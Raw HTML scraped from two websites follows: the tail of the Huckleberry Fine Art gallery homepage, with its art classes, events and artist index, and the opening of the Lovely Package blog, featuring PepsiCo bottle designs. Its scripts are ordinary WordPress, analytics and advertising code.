menu-item-type-post_type menu-item-object-page menu-item-71"><a href="https://huckleberryfineart.com/about-us/submissions/">Submissions</a></li><li id="menu-item-87" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-87"><a href="https://huckleberryfineart.com/blog/">Blog</a></li> </ul> </div> </div> <div class="side-nav"> </div><!-- /#side-nav --> </section><!-- /.menus --> <a href="#top" class="nav-close"><span>Return to Content</span></a> </nav> </div><!--/#nav-container--> <!-- #content Starts --> <div id="loopedSlider" class="business-slider has-pagination woo-slideshow"> <ul class="slides"> <li id="slide-1104" class="slide slide-number-1" > <a href="/about-us/" title="Huckleberry Fine Art"> <img src="https://huckleberryfineart.com/wp-content/uploads/2015/09/image-10.jpeg" alt="Huckleberry Fine Art gallery" width="1600" title="Huckleberry Fine Art" class="woo-image" /> </a> <div class="content"> <div class="title"> <h2 class="title"> <a href="/about-us/" title="Huckleberry Fine Art"> Huckleberry Fine Art </a> </h2> </div> <div class="excerpt"> <p>The premier art gallery in the Washington DC metropolitan area</p> </div><!-- /.excerpt --> </div><!-- /.content --> </li><!-- /.slide-number-1 --> <li id="slide-147862" class="slide slide-number-2" style="width: 1600px; display:none;"> <a href="https://huckleberryfineart.com/event/" title="Fall Fresh &#8211; Show &#038; Sale &#8211; Oct 25 &#8211; 27"> <img src="https://huckleberryfineart.com/wp-content/uploads/2018/04/Oct-2018-Show-Sale.png" alt="Oct 2018 Show Sale" width="1600" title="Fall Fresh &#8211; Show &#038; Sale &#8211; Oct 25 &#8211; 27" class="woo-image" /> </a> <div class="content"> <div class="title"> <h2 class="title"> <a href="https://huckleberryfineart.com/event/" title="Fall Fresh &#8211; Show &#038; Sale &#8211; Oct 25 &#8211; 27"> Fall Fresh &#8211; Show &#038; Sale &#8211; Oct 25 &#8211; 27 </a> </h2> </div> </div><!-- /.content --> </li><!-- /.slide-number-2 --> </ul><!-- /.slides --> </div><!-- /#loopedSlider --> <div class="pagination-wrap slider-pagination"> <ol class="flex-control-nav flex-control-paging"> <li><a>1</a></li> <li><a>2</a></li> </ol> </div> <div id="content" class="col-full business"> <div id="main-sidebar-container"> <!-- #main Starts --> <section id="main"> <article class="post-855 page type-page status-publish hentry"> <section class="entry"> <p>As the premier art gallery in the Washington DC metropolitan area, Huckleberry Fine Art specializes in finding <a href="http://huckleberryfineart.com/artists/">emerging artists</a> locally and internationally. Since it&#8217;s existence, the gallery has been exhibiting a vast collection of vibrant oil and acrylic paintings, limited edition signed and numbered prints, sculpture, photography, art books and custom framing.</p> <div class="widget widget_woothemes_features"> <div class="features columns-3"> <div class="feature first"><h3 class="feature-title"><a href="/about-us/" title="Submissions" >Submissions</a></h3><div class="feature-content"><a href="http://huckleberryfineart.com/about-us/submissions/"><img class="alignnone wp-image-1143 size-large" src="http://huckleberryfineart.com/wp-content/uploads/2015/09/DSC_3375-1024x681.jpg" alt="Painting" width="1024" height="681" /></a> Huckleberry Fine Art is always looking for talented artists from all over. To submit art for us to review please email the gallery with your website and information at <a href="mailto:[email protected]">[email protected]</a> <a href="http://huckleberryfineart.com/about-us/submissions/">Learn More &gt;&gt;</a></div></div><div class="feature"><h3 class="feature-title"><a href="https://huckleberryfineart.com/feature/artclasses/" title="Art Classes" >Art Classes</a></h3><div class="feature-content"><a href="http://huckleberryfineart.com/about-us/school/"><img class="alignnone size-full wp-image-1141" src="http://huckleberryfineart.com/wp-content/uploads/2015/09/photo3-e1445454059562.jpg" alt="Kid Art Classes" width="915" height="686" /></a> There is no better way to learn art than in an art gallery. Huckleberry Fine Art has been offering art classes for children, between the ages of 5 and 14, for years. With small classes, the students are able to thrive on a more individualized instruction from our teacher. To learn more or to sign up your child today, please call the gallery at 301-881-5977 or email us at <a href="mailto:[email protected]">[email protected]</a>.</div></div><div class="feature last"><h3 class="feature-title"><a href="https://huckleberryfineart.com/feature/paintingandwine/" title="Painting &#038; Wine" >Painting &#038; Wine</a></h3><div class="feature-content"><a href="http://huckleberryfineart.com/about-us/women-who-wine/"><img class="alignnone size-full wp-image-1111" src="http://huckleberryfineart.com/wp-content/uploads/2015/09/classslide.jpg" alt="classslide" width="915" height="429" /></a> Huckleberry Fine Art offers a monthly "Painting &amp; Wine" class for adults, that will surely get the creative juices flowing. Taught by some local artists, we are here to help you step-by-step create your own work of art. We also offer private group classes for bridal showers, girls-night-out or any other event you want to celebrate. For more information on schedules or for private group classes, please call the gallery at 301-881-5977, or email us at <a href="mailto:[email protected]">[email protected]</a></div></div><div class="fix"></div> </div><!--/.features--> </div><!--/.widget widget_woothemes_features--> </section><!-- /.entry --> <div class="fix"></div> </article><!-- /.post --> </section><!-- /#main --> </div><!-- /#main-sidebar-container --> </div><!-- /#content --> <div id="pw_stick_brands" class="pw-stick pw-stick-light pw-right-stick "><span class="pw-title">Artist</span></div><div class="pw-content pw-content-4 pw_stick_brands pw-content-light pw-content-right "> <div class="pw-content-close"></div> <div class="wb-filter-style1"> <div class="wb-alphabet-table"> <div class="wb-all-alphabet"> <a class="wb-alphabet-item wb-alphabet-item-eb active-letter-eb" href="#!">ALL</a> </div> <div class="wb-other-brands"> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">A</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">B</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">C</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">D</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">E</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">F</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">G</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">H</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">I</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">J</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">K</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">L</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">M</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">N</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">O</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">P</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">Q</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">R</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">S</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">T</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">U</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">V</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">W</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">X</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">Y</a> <a class="wb-alphabet-item wb-alphabet-item-eb" href="#!">Z</a> <a class="wb-alphabet-item wb-alphabet-item-eb wb-alphabet-item-number" href="#!">123</a> </div> </div> <div class="eb-scrollbarcnt eb-scroll"> <div class="scrollbar"><div class="track"><div class="thumb"><div class="end"></div></div></div></div><div class="viewport" style="height:200px"> <div class="overview"><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/robert-allison/">Allison, Robert</a><span class="brand-count" > (12)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/thomas-barbey/">Barbey, Thomas</a><span class="brand-count" > (35)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/kurt-bittle/">Bittle, Kurt</a><span class="brand-count" > (7)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/michael-cheval/">Cheval, Michael</a><span class="brand-count" > (30)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/suzanne-clifford-clark/">Clifford-Clark, Suzanne</a><span class="brand-count" > (15)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/chris-dellorco/">Dellorco, Chris</a><span class="brand-count" > (7)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/gavin-glakas/">Glakas, Gavin</a><span class="brand-count" > (9)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/rob-gonsalves/">Gonsalves, Rob</a><span class="brand-count" > (81)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/alexis-greenberg/">Greenberg, Alexis</a><span class="brand-count" > (50)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/claire-hardy/">Hardy, Claire</a><span class="brand-count" > (14)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/erica-hopper/">Hopper, Erica</a><span class="brand-count" > (18)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/paul-james/">James, Paul</a><span class="brand-count" > (15)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/david-janni/">Janni, David</a><span class="brand-count" > (5)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/debra-keirce/">Keirce, Debra</a><span class="brand-count" > (65)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/lieske-brennen/">Lieske, Brennen</a><span class="brand-count" > (11)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/holly-lombardo/">Lombardo, Holly</a><span class="brand-count" > (3)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/j-scott-nicol/">Nicol, J. Scott</a><span class="brand-count" > (58)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/anne-packard/">Packard, Anne</a><span class="brand-count" > (45)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/bob-ransley/">Ransley, Bob</a><span class="brand-count" > (16)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/tricia-ratliff/">Ratliff, Tricia</a><span class="brand-count" > (14)</span></div><div class="wb-filter-item-cnt brand-item-eb"><a class="wb-filter-item" href="https://huckleberryfineart.com/artist/voytek/">Voytek</a><span class="brand-count" > (17)</span></div></div></div> </div> </div> </div> <!--#footer-widgets-container--> <div id="footer-widgets-container"> <section id="footer-widgets" class="col-full col-3"> <div class="block footer-widget-1"> <div id="text-3" class="widget widget_text"><h3>About Huckleberry Fine Art</h3> <div class="textwidget"><p>As the premier art gallery in the Washington DC metropolitan area, Huckleberry Fine Art specializes in finding emerging artists locally and internationally. Since it's existence, the gallery has been exhibiting a vast collection of vibrant oil and acrylic paintings, limited edition signed and numbered prints, sculpture, photography, art books and custom framing. </p> </div> </div> </div> <div class="block footer-widget-2"> <div id="nav_menu-2" class="widget widget_nav_menu"><h3>Around the Galllery</h3><div class="menu-gallery-menu-container"><ul id="menu-gallery-menu" class="menu"><li id="menu-item-94" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94"><a href="https://huckleberryfineart.com/about-us/j-hilburn/">J. Hilburn</a></li> <li id="menu-item-95" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95"><a href="https://huckleberryfineart.com/about-us/events/">Event Venue</a></li> </ul></div></div> </div> <div class="block footer-widget-3"> <div id="woo_subscribe-2" class="widget widget_woo_subscribe"> <aside id="connect"> <h3>Subscribe / Connect</h3> <div > <p>Subscribe to our e-mail newsletter to receive updates.</p> <div class="social"> <a href="https://huckleberryfineart.com/feed/" class="subscribe" title="RSS"></a> <a target="_blank" href="https://twitter.com/Huckleberry_Art" class="twitter" title="Twitter"></a> <a target="_blank" href="https://www.facebook.com/HuckleberryFineArt/" class="facebook" title="Facebook"></a> <a target="_blank" href="http://www.linkedin.com/in/huckleberryfineart" class="linkedin" title="LinkedIn"></a> <a target="_blank" href="https://www.instagram.com/huckleberry_fine_art/" class="instagram" title="Instagram"></a> </div> </div><!-- col-left --> <div class="fix"></div> </aside> </div> </div> <div class="fix"></div> </section><!--/#footer-widgets--> </div><!--/#footer_widgets_container_end--> <!--#footer_container_start--> <div id="footer-container"> <footer id="footer" class="col-full"> <div id="copyright" class="col-left"> <p>&copy; 2019 Huckleberry Fine Art. All Rights Reserved. </p> </div> <div id="credit" class="col-right"> <p><p>Site design by <a href="http://www.glimmernet.com">Glimmernet Technologies</a></p></p> </div> </footer> </div><!--/#footer_container_end--> </div><!-- /#inner-wrapper --> </div><!-- /#wrapper --> <div class="fix"></div><!--/.fix--> <script> ( function ( body ) { 'use strict'; body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' ); } )( document.body ); </script> <script> /* <![CDATA[ */var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesMin":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done","today":"Today","clear":"Clear"}};var tribe_system_info = {"sysinfo_optin_nonce":"b96ac12865","clipboard_btn_text":"Copy to clipboard","clipboard_copied_text":"System info copied","clipboard_fail_text":"Press \"Cmd + C\" to copy"};/* ]]> */ </script> <script type="text/javascript"> var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; </script> <link rel='stylesheet' id='center_logo-css' href='https://huckleberryfineart.com/wp-content/plugins/cx-logo-inside-nav-master/styles/center_logo.css?ver=5.2' type='text/css' media='all' /> <script src='https://huckleberryfineart.com/wp-content/plugins/the-events-calendar/common/src/resources/js/underscore-before.js'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-includes/js/underscore.min.js?ver=1.8.3'></script> <script src='https://huckleberryfineart.com/wp-content/plugins/the-events-calendar/common/src/resources/js/underscore-after.js'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-includes/js/backbone.min.js?ver=1.2.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpApiSettings = {"root":"https:\/\/huckleberryfineart.com\/wp-json\/","nonce":"17727f120a","versionString":"wp\/v2\/"}; /* ]]> */ </script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-includes/js/api-request.min.js?ver=5.2'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-includes/js/wp-api.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/huckleberryfineart.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/huckleberryfineart.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"}; /* ]]> */ </script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.6.2'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_582f270493da77298dfd49f024b73917","fragment_name":"wc_fragments_582f270493da77298dfd49f024b73917","request_timeout":"5000"}; /* ]]> */ </script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.2'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/woocommerce/assets/js/flexslider/jquery.flexslider.min.js?ver=2.7.2'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/cx-logo-inside-nav-master/scripts/imagesloaded.pkgd.min.js?ver=5.2'></script> <script type='text/javascript' src='https://huckleberryfineart.com/wp-content/plugins/cx-logo-inside-nav-master/scripts/center_logo.js?ver=5.2'></script> </body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Object Caching 0/408 objects using apc Page Caching using disk: enhanced Database Caching using memcached (Request-wide modification query) Served from: huckleberryfineart.com @ 2019-05-16 09:54:34 by W3 Total Cache -->
0
<!doctype html> <html lang="en-US"> <head> <title>Lovely Package | Curating the very best packaging design</title> <meta name="description" content="Curating the very best packaging design"> <meta name="robots" content="follow, all" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="stylesheet" type="text/css" media="all" href="http://lovelypackage.com/wp-content/themes/lp_elements-of-seo/style.css" /> <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://lovelypackage.com/feed/" /> <link rel="alternate" type="text/xml" title="RSS .92" href="http://lovelypackage.com/feed/rss/" /> <link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://lovelypackage.com/feed/atom/" /> <link rel="pingback" href="http://lovelypackage.com/xmlrpc.php" /> <link rel="shortcut icon" href="http://lovelypackage.com/wp-content/themes/lp_elements-of-seo/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script> <script>window.jQuery || document.write('<script src="http://lovelypackage.com/wp-content/themes/lp_elements-of-seo/js/jquery-1.6.2.min.js"><\/script>')</script> <script> $(document).ready(function(){ $('body').removeClass('date'); }); </script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/lovelypackage.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=ddeca9152fea46b7852d04f49926aaa8"}}; !function(a,b,c){function d(a){var c,d,e,f=b.createElement("canvas"),g=f.getContext&&f.getContext("2d"),h=String.fromCharCode;return g&&g.fillText?(g.textBaseline="top",g.font="600 32px Arial","flag"===a?(g.fillText(h(55356,56806,55356,56826),0,0),f.toDataURL().length>3e3):"diversity"===a?(g.fillText(h(55356,57221),0,0),c=g.getImageData(16,16,1,1).data,g.fillText(h(55356,57221,55356,57343),0,0),c=g.getImageData(16,16,1,1).data,e=c[0]+","+c[1]+","+c[2]+","+c[3],d!==e):("simple"===a?g.fillText(h(55357,56835),0,0):g.fillText(h(55356,57135),0,0),0!==g.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag"),unicode8:d("unicode8"),diversity:d("diversity")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag&&c.supports.unicode8&&c.supports.diversity||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='pinterest-pin-it-button-plugin-styles-css' href='http://lovelypackage.com/wp-content/plugins/pinterest-pin-it-button/css/public.css?ver=ddeca9152fea46b7852d04f49926aaa8' type='text/css' media='all' /> <link rel='stylesheet' id='wp-pagenavi-css' href='http://lovelypackage.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=ddeca9152fea46b7852d04f49926aaa8' type='text/css' media='all' /> <!-- This site uses the Google Analytics by Yoast plugin v5.4.6 - Universal enabled - https://yoast.com/wordpress/plugins/google-analytics/ --> <script type="text/javascript"> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-142602-9', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('send','pageview'); </script> <!-- / Google Analytics by Yoast --> <link rel='https://api.w.org/' href='http://lovelypackage.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://lovelypackage.com/xmlrpc.php?rsd" /> <!-- This site is using AdRotate v3.15.2 to display their advertisements - https://ajdg.solutions/products/adrotate-for-wordpress/ --> <style type="text/css">div.simplesocial,a.simplesocial{float:left;display:block}a.simplesocial{margin-right:5px;width:16px;height:16px}a.simplesocial:hover{margin-top:-2px}</style> <script language="javascript">function simplesocial(t,w,h){ window.open(t.href, 'simplesocial', 'scrollbars=1,menubar=0,width='+w+',height='+h+',resizable=1,toolbar=0,location=0,status=0,left='+(screen.width-w)/2+',top='+(screen.height-h)/3); return false;}</script> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//lovelypackage.com/?wordfence_logHuman=1&hid=05A0880A2EA9F65A0A9CD9F54B400A0A'); </script></head> <body class="blog"> <!-- BuySellAds.com Ad Code --> <script type="text/javascript"> (function(){ var bsa = document.createElement('script'); bsa.type = 'text/javascript'; bsa.async = true; bsa.src = 'http://s3.buysellads.com/ac/bsa.js'; (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa); })(); </script> <!-- End BuySellAds.com Ad Code --> <div id="wrap"> <div id="masthead"> <h1 id="blog-title">Lovely Package</h1> <h3>Curating the very best packaging design</h3> <div id="leaderboard-ad"> <!-- BuySellAds Zone Code --> <div id="bsap_1271239" class="bsarocks bsap_cda743cc773aefa17eb7170913bd758f"></div> <!-- End BuySellAds Zone Code --> </div> <a href="http://lovelypackage.com/" title="Lovely Package" rel="home" id="banner">Lovely Package : Curating the very best packaging design</a> </div> <div id="content"> <div id="contentleft"> <div class="entry-contnet"> <h2 class="entry-title"> <a class="entry-link" href="http://lovelypackage.com/lifewtr-series-1/" rel="bookmark">LIFEWTR Series 1</a> </h2> <p class="date">March 26, 2018 | <a href="http://lovelypackage.com/lifewtr-series-1/#respond">0 Comments</a></p> <p><img class="alignnone size-full wp-image-38945" src="http://lovelypackage.com/wp-content/uploads/2018/02/55687-158879-lifewtr-series-1-bottle-graphics-image-1-e1518817153957.jpg" alt="55687-158879-lifewtr-series-1-bottle-graphics-image-1" width="538" height="538" /></p> <p>Designed by PepsiCo Design &amp; Innovation | Country: United States</p> <p><em>&#8220;Released in a series of three, with label designs refreshing quarterly, LIFEWTR bottles will feature different creators’ work to introduce distinct expressions of creativity. The first series features the captivating work of some of the boldest and most transformative artists of today: MOMO, Craig &amp; Karl, and Jason Woodside.&#8221;</em></p> <p> <a href="http://lovelypackage.com/lifewtr-series-1/#more-38944" class="more-link">Continue…</a></p> <div><div style="padding-top:10px;margin-bottom:10px;font-size:10pt;font-family:arial;font-weight:bold;"></div><div style="clear:both"></div><a class=simplesocial onclick="return simplesocial(this,500,400)" title="Share on Facebook" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/facebook.png)" href="http://www.facebook.com/share.php?u=http%3A%2F%2Flovelypackage.com%2Flifewtr-series-1%2F&t=LIFEWTR+Series+1"></a><a class=simplesocial onclick="return simplesocial(this,812,420)" title="Share on Twitter" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/twitter.png)" href="http://twitter.com/home?status=http%3A%2F%2Flovelypackage.com%2Flifewtr-series-1%2F"></a><a class=simplesocial onclick="return simplesocial(this,435,500)" title="Email a Friend" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/email.png)" href="http://www.freetellafriend.com/tell/?heading=Share+This+Article&bg=1&option=email&url=http%3A%2F%2Flovelypackage.com%2Flifewtr-series-1%2F"></a><a class=simplesocial onclick="return simplesocial(this,750,500)" title="Share on StumbleUpon" style="background:url(http://lovelypackage.com/wp-content/plugins/simple-social-sharing-widgets-icons/icons_16/stumbleupon.png)" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Flovelypackage.com%2Flifewtr-series-1%2F&title=LIFEWTR+Series+1"></a></div><div style="clear:both;margin-bottom:20px"></div><div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Flovelypackage.com%2Flifewtr-series-1%2F&media=http%3A%2F%2Flovelypackage.com%2Fwp-content%2Fuploads%2F2018%2F02%2F55687-158879-lifewtr-series-1-bottle-graphics-image-1-e1518817153957.jpg&description=LIFEWTR%20Series%201" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div><div style="clear:both;"></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://lovelypackage.com/lifewtr-series-1/" dc:identifier="http://lovelypackage.com/lifewtr-series-1/" dc:title="LIFEWTR Series 1" trackback:ping="http://lovelypackage.com/lifewtr-series-1/trackback/" /> </rdf:RDF> --> </div> <div class="entry-contnet"> <h2 class="entry-title"> <a class="entry-link" href="http://lovelypackage.com/pepsi-prestige/" rel="bookmark">Pepsi Prestige</a> </h2> <p class="date">March 19, 2018 | <a href="http://lovelypackage.com/pepsi-prestige/#respond">0 Comments</a></p> <p><img class="alignnone size-full wp-image-38938" src="http://lovelypackage.com/wp-content/uploads/2018/02/54842-158879-pepsi-prestige-aluminum-bottle-image-1-e1518816730405.jpg" alt="54842-158879-pepsi-prestige-aluminum-bottle-image-1" width="538" height="538" /></p> <p>Designed by PepsiCo Design &amp; Innovation | Country: United States</p> <p><em>&#8220;The Prestige Bottle shape reflects the Pepsi heritage by nodding to prior classic glass structures in their most recognizable and simplified form. Its smooth aluminum finish is cool to the touch, communicating the ice-cold refreshment of the product inside. Subtle graphic patterns and vibrant colors capture the eye and differentiate between the brand’s variants. The clean shape allows for countless designs to be incorporated on future iterations of the Prestige Bottle.&#8221;</em></p> <p> <a href="http://lovelypackage.com/pepsi-prestige/#more-38937" class="more-link">Continue…</a></p> <div><div 